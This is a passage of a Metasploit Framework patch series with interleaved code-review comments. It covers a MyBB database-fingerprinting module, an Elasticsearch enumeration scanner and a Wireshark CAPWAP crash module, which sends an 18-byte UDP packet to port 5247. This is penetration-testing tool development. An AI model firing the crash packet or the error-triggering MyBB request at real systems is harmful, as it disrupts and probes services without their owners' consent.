+ end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + + end + + + def run + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + end +end From 3788f136d9aaf371c23772678fce314a3b157f95 Mon Sep 17 00:00:00 2001 
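Review bot: The info hash of this auxiliary module still carries exploit-only keys — 'Privileged', 'Platform', 'Arch', 'Targets' and 'DefaultTarget' — which an `Msf::Auxiliary` module does not use; dropping them, along with the trailing space in `'Name' => 'Determinant Databases MyBB '`, leaves the metadata honest. In `run`, the PostgreSQL signature hardcodes the `mybb_` table prefix, which MyBB's installer lets the administrator change, so such forums fall into the final "MySQL or ... unknown" branch; the message should say that no database-specific error was observed rather than imply MySQL. `check` here is the same code reviewed on the previous commit (unchecked nil `res`, 1024-second `send_recv` timeout, `rescue RuntimeError`) and needs the same fixes.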
From: silascutler
Date: Tue, 1 Apr 2014 11:43:15 -0400
Subject: [PATCH 12/47] Update es_enum.rb Updated based on comments.
---
 modules/auxiliary/scanner/elasticsearch/es_enum.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb
index a44eea1cee..0e8735fdc5 100644
--- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb
+++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb
@@ -33,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary
 res = send_request_raw({
 'uri' => '/_aliases',
 'method' => 'GET',
- 'version' => '1.0',
- }, 10)
+ })
 
 begin
 json_body = JSON.parse(res.body)
@@ -54,8 +53,7 @@ class Metasploit3 < Msf::Auxiliary
 print_error("Failed to save the result")
 end
 
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- rescue ::Timeout::Error, ::Errno::EPIPE
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable
 end
 end
 end
From c035715a711f507b5895f429c60a3a6f7f88fc8c Mon Sep 17 00:00:00 2001
From: Karmanovskii
Date: Sat, 5 Apr 2014 02:50:53 -0700
Subject: [PATCH 13/47] Update mybb_get_type_db.rb Changed the name of the variable _Version_server on _version_server according to the recommendation of jvazquez-r7
---
 modules/auxiliary/gather/mybb_get_type_db.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb
index e20d863f2d..58d01b6d58 100644
--- a/modules/auxiliary/gather/mybb_get_type_db.rb
+++ b/modules/auxiliary/gather/mybb_get_type_db.rb
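Review bot: Dropping `::Rex::ConnectionTimeout` and `::Timeout::Error` from the rescue list (hunk @@ -54,8) means a connect timeout now escapes run_host, while a read timeout still makes send_request_raw return nil and trips `JSON.parse(res.body)` further up; if the intent is a shorter list, `rescue ::Rex::ConnectionError, ::Timeout::Error => e` with a `vprint_error` covers all three and keeps the scan moving to the next host. Removing `'version' => '1.0'` is fine, but the explicit `10` second timeout went with it in hunk @@ -33,8, so the mixin default now applies; a short comment saying that is deliberate would help.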
@@ -73,19 +73,19 @@ class Metasploit3 < Msf::Auxiliary
 end
 
 #Check Web-Server
- _Version_server = res['Server']
- if _Version_server
- _Version_server = " Server Version: #{_Version_server}".ljust(40)
+ _version_server = res['Server']
+ if _version_server
+ _version_server = " Server Version: #{_Version_server}".ljust(40)
 else
- _Version_server = " Server Version: unknown".ljust(40)
+ _version_server = " Server Version: unknown".ljust(40)
 end
 
 #Check forum MyBB
 if res.body.match("MYBB")
- print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server)
+ print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server)
 return Exploit::CheckCode::Detected
 else
- print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server)
+ print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server)
 return Exploit::CheckCode::Unknown
 end
 rescue RuntimeError => err
From 5dbd124ef9440ae72923fb817d47184b8639c536 Mon Sep 17 00:00:00 2001
From: Karmanovskii
Date: Sat, 5 Apr 2014 02:53:43 -0700
Subject: [PATCH 14/47] Update mybb_get_type_db.rb
---
 modules/auxiliary/gather/mybb_get_type_db.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb
index 58d01b6d58..ad1e413cab 100644
--- a/modules/auxiliary/gather/mybb_get_type_db.rb
+++ b/modules/auxiliary/gather/mybb_get_type_db.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
 #Check Web-Server
 _version_server = res['Server']
 if _version_server
- _version_server = " Server Version: #{_Version_server}".ljust(40)
+ _version_server = " Server Version: #{_version_server}".ljust(40)
 else
 _version_server = " Server Version: unknown".ljust(40)
 end
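Review bot: A leading underscore on a local that is actually read (`_version_server`, hunk @@ -73,19) is the Ruby convention for an intentionally unused variable and RuboCop flags its use; `server_version` says what it is. The same hunk's `+` line still interpolates the old name, `" Server Version: #{_Version_server}"`, which raises NameError whenever a Server header is present; the next commit in the series (hunk @@ -75,7) repairs that one token, so the rename and the fix could be squashed.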
From 7b9b20a07ecf5258fe208f92665abfbc999619bd Mon Sep 17 00:00:00 2001
From: silascutler
Date: Mon, 7 Apr 2014 14:30:52 -0400
Subject: [PATCH 15/47] Corrected Spaces Issues Removed extra spaces on line 23&24
---
 modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb
index 0e8735fdc5..804cc8fcc9 100644
--- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb
+++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
 'Silas Cutler '
 ],
 'License' => MSF_LICENSE
- ))
+ ))
 
 register_options(
 [
From 55d8be8238742b2816a711611c7ad1968fb72b9b Mon Sep 17 00:00:00 2001
From: JoseMi
Date: Tue, 29 Apr 2014 22:55:14 +0100
Subject: [PATCH 16/47] Add cve-2013-4074 module to crash dissector capwap
---
 .../windows/misc/wireshark_capwap_dos.rb | 67 +++++++++++++++++++
 1 file changed, 67 insertions(+)
 create mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb
diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb
new file mode 100644
index 0000000000..818d62692a
--- /dev/null
+++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb
@@ -0,0 +1,67 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS',
+ 'Description' => %q{
+ This module inject malicioous packet udp to crash wireshark
+ )
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'j0sm1', # Exploit and msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-4074'],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'DisableNops' => 'True',
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Wireshark CAPWAP dissector CRASH',
+ {
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 28 2014',
+ 'DefaultTarget' => 0))
+
+ # Protocol capwap needs port 5247 to trigger the dissector in wireshark
+ register_options([ Opt::RPORT(5247) ], self.class)
+
+ end
+
+ def exploit
+
+ connect_udp
+
+ # We send a packet incomplete to crash dissector
+ print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
+ buf = "\x90" * 18
+ udp_sock.put(buf)
+
+ disconnect_udp
+
+ end
+end
From b0da032136d572c237ea8b64ee05b35b3095f913 Mon Sep 17 00:00:00 2001
From: JoseMi
Date: Tue, 29 Apr 2014 23:06:30 +0100
Subject: [PATCH 17/47] Modified the metadatas
---
modules/exploits/windows/misc/wireshark_capwap_dos.rb | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb
index 818d62692a..603f5e81ca 100644
--- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb
+++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb
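Review bot: The `'Description'` `%q{…}` block on the new side contains a stray `)` on its own line, which will be shown verbatim as part of the module description; drop it. The `'DefaultOptions' => { 'EXITFUNC' => 'process' }` and `'Payload' => { 'DisableNops' => 'True' }` entries describe a payload that `exploit` never stages (it only writes one fixed datagram to `udp_sock`), so they are misleading metadata for a denial-of-service module and are better removed; if kept, `'DisableNops'` is written as the string `'True'` where the sibling keys such as `'Privileged' => false` use a boolean (hedged: inferred from the other keys, not from framework code visible here). The header comment also has a typo, `http//metasploit.com/download` should be `http://metasploit.com/download`. The same description text and metadata are carried unchanged into the later re-add of this file under modules/auxiliary/dos in this series (patch 20).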
@@ -13,15 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Name' => 'Wireshark CAPWAP dissector crash', 'Description' => %q{ - This module inject malicioous packet udp to crash wireshark + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. ) }, 'License' => MSF_LICENSE, 'Author' => [ 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => [ From cbb84e854ca35f66b5b199a63fdedfc52b1d4e9d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 14 May 2014 14:56:40 +0400 Subject: [PATCH 18/47] Update mybb_get_type_db.rb 14.05.2014 Eliminated notes jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 143 +++++++++---------- 1 file changed, 69 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index ad1e413cab..a61c1166d1 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb 
@@ -12,27 +12,19 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + Determine the database in the forum. + This affects versions <= 1.6.12 }, 'Author' => [ - #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 13 2014')) register_options( 
@@ -43,78 +35,81 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_cgi({ + 'uri' => uri, + 'method' => 'GET',}) + if req.nil? + print_error("Failed to retrieve webpage.") + return Exploit::CheckCode::Unknown + end + if req + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? 
+ end - #Check Web-Server - _version_server = res['Server'] - if _version_server - _version_server = " Server Version: #{_version_server}".ljust(40) - else - _version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! 
This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end end def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) + response = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") + print_error("Failed to retrieve webpage.") + return end #Resolve response From 74b491e715ccec4434a537ba87bc5ed69438be8c Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 17 May 2014 11:25:38 +0100 Subject: [PATCH 19/47] Delete wireshark_capwap_dos module --- .../windows/misc/wireshark_capwap_dos.rb | 69 ------------------- 1 file changed, 69 deletions(-) delete mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb 
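Review bot: In the rewritten `run`, `send_request_cgi` is handed `Accept`, `Accept-Language`, `User-Agent`, `Accept-Encoding`, `Connection` and `Cookie` under `'vars_get'`, so they are appended to the query string of `/memberlist.php?letter=-1` as GET parameters instead of being sent as request headers; the key should be `'headers'`, which is what the replaced `send_request_raw` call used. The same `'vars_get'` mix-up is introduced into `check` by a later commit in this series (patch 21). In the `check` hunk, `if req.nil?` returning early is immediately followed by `if req … else … end`, whose `else` branch can no longer execute, and `_Version_server` reappears with the capitalised spelling that the earlier rename in this series had removed. `run` continues past the end of the hunk.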
diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb
deleted file mode 100644
index 603f5e81ca..0000000000
--- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb
+++ /dev/null
@@ -1,69 +0,0 @@
-#
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-
- Rank = GoodRanking
-
- include Msf::Exploit::Remote::Udp
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Wireshark CAPWAP dissector crash',
- 'Description' => %q{
- This module inject malicious packet udp to crash wireshark. The crash is when we send
- a incomplete packet and trigger capwap dissector.
- )
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'j0sm1', # Exploit and msf module
- 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti"
- ],
- 'References' =>
- [
- [ 'CVE', '2013-4074'],
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Payload' =>
- {
- 'DisableNops' => 'True',
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- [ 'Wireshark CAPWAP dissector CRASH',
- {
- }
- ],
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Apr 28 2014',
- 'DefaultTarget' => 0))
-
- # Protocol capwap needs port 5247 to trigger the dissector in wireshark
- register_options([ Opt::RPORT(5247) ], self.class)
-
- end
-
- def exploit
-
- connect_udp
-
- # We send a packet incomplete to crash dissector
- print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
- buf = "\x90" * 18
- udp_sock.put(buf)
-
- disconnect_udp
-
- end
-end
From 21cf0a162cb8619dc950a765cdd49d57be597e5a Mon Sep 17 00:00:00 2001
From: JoseMi
Date: Sat, 17 May 2014 11:31:43 +0100
Subject: [PATCH 20/47] Added module to crash capwap dissector in wireshark tool
---
.../dos/wireshark/wireshark_capwap_dos.rb | 69 +++++++++++++++++++
1 file changed, 69 insertions(+)
create mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
new file mode 100644
index 0000000000..603f5e81ca
--- /dev/null
+++ b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb
@@ -0,0 +1,69 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Wireshark CAPWAP dissector crash',
+ 'Description' => %q{
+ This module inject malicious packet udp to crash wireshark. The crash is when we send
+ a incomplete packet and trigger capwap dissector.
+ )
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'j0sm1', # Exploit and msf module
+ 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti"
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-4074'],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'DisableNops' => 'True',
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Wireshark CAPWAP dissector CRASH',
+ {
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 28 2014',
+ 'DefaultTarget' => 0))
+
+ # Protocol capwap needs port 5247 to trigger the dissector in wireshark
+ register_options([ Opt::RPORT(5247) ], self.class)
+
+ end
+
+ def exploit
+
+ connect_udp
+
+ # We send a packet incomplete to crash dissector
+ print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
+ buf = "\x90" * 18
+ udp_sock.put(buf)
+
+ disconnect_udp
+
+ end
+end
From 06912ac2b6180258b0ef8ead30eedfd15795bc27 Mon Sep 17 00:00:00 2001
From: Karmanovskii
Date: Sat, 17 May 2014 16:30:29 +0400
Subject: [PATCH 21/47] Update mybb_get_type_db.rb
1.Changed "Rex::Proto::Http::Client" to "Msf::Exploit::Remote::HttpClient" 2.changed the name of the variable "_Version_server".
---
modules/auxiliary/gather/mybb_get_type_db.rb | 54 ++++++++++----------
1 file changed, 27 insertions(+), 27 deletions(-)
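Review bot: Although the file now lives under modules/auxiliary/dos, the new side still declares `class Metasploit3 < Msf::Exploit::Remote` and names its entry point `exploit`; an auxiliary module is expected to be `class Metasploit3 < Msf::Auxiliary` with `include Msf::Auxiliary::Dos` and a `def run` entry point, and I would not expect the framework to load an exploit-derived class from the auxiliary tree (hedged: inferred from the module-type convention, not from anything visible in the hunk). With that change the `'Payload'` and `'DefaultOptions' => { 'EXITFUNC' => 'process' }` entries, which describe a payload this module never uses, should go as well, as should the stray `)` line inside the `%q{}` description that this re-add carries over unchanged from the deleted file.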
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index a61c1166d1..e007166e77 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -36,24 +36,24 @@ class Metasploit3 < Msf::Auxiliary def check begin uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_cgi({ - 'uri' => uri, - 'method' => 'GET',}) - if req.nil? + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) + if res.nil? print_error("Failed to retrieve webpage.") return Exploit::CheckCode::Unknown end - if req - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end + if res.code != 200 print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") return Exploit::CheckCode::Unknown 
@@ -69,19 +69,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + web_server = res['Server'] + if web_server + web_server = " Server Version: #{web_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + web_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" } }) if response.nil? From e26dee5e22ba0e7327580da2801f2cc3f913d7ad Mon Sep 17 00:00:00 2001 
From: Karmanovskii Date: Mon, 19 May 2014 21:32:30 +0400 Subject: [PATCH 22/47] Update mybb_get_type_db.rb 19/05/2014 I deleted - #return Exploit::CheckCode::Unknown # necessary ???? --- modules/auxiliary/gather/mybb_get_type_db.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e007166e77..b96e7a1a64 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -65,7 +65,6 @@ class Metasploit3 < Msf::Auxiliary php_version = " PHP Version: #{php_version}".ljust(40) else php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? end #Check Web-Server From 21de14ac3d0a28cb58c4e9f1350087eb97ceb344 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 20 May 2014 17:08:12 -0500 Subject: [PATCH 23/47] Initial stab at AFP login scanner --- lib/metasploit/framework/afp/client.rb | 323 ++++++++++++++++++ lib/metasploit/framework/login_scanner/afp.rb | 43 +++ .../framework/login_scanner/result.rb | 2 +- .../metasploit/framework/afp/client_spec.rb | 0 .../framework/login_scanner/afp_spec.rb | 16 + 5 files changed, 383 insertions(+), 1 deletion(-) create mode 100644 lib/metasploit/framework/afp/client.rb create mode 100644 lib/metasploit/framework/login_scanner/afp.rb create mode 100644 spec/lib/metasploit/framework/afp/client_spec.rb create mode 100644 spec/lib/metasploit/framework/login_scanner/afp_spec.rb diff --git a/lib/metasploit/framework/afp/client.rb b/lib/metasploit/framework/afp/client.rb new file mode 100644 index 0000000000..2bc578d7a7 --- /dev/null +++ b/lib/metasploit/framework/afp/client.rb 
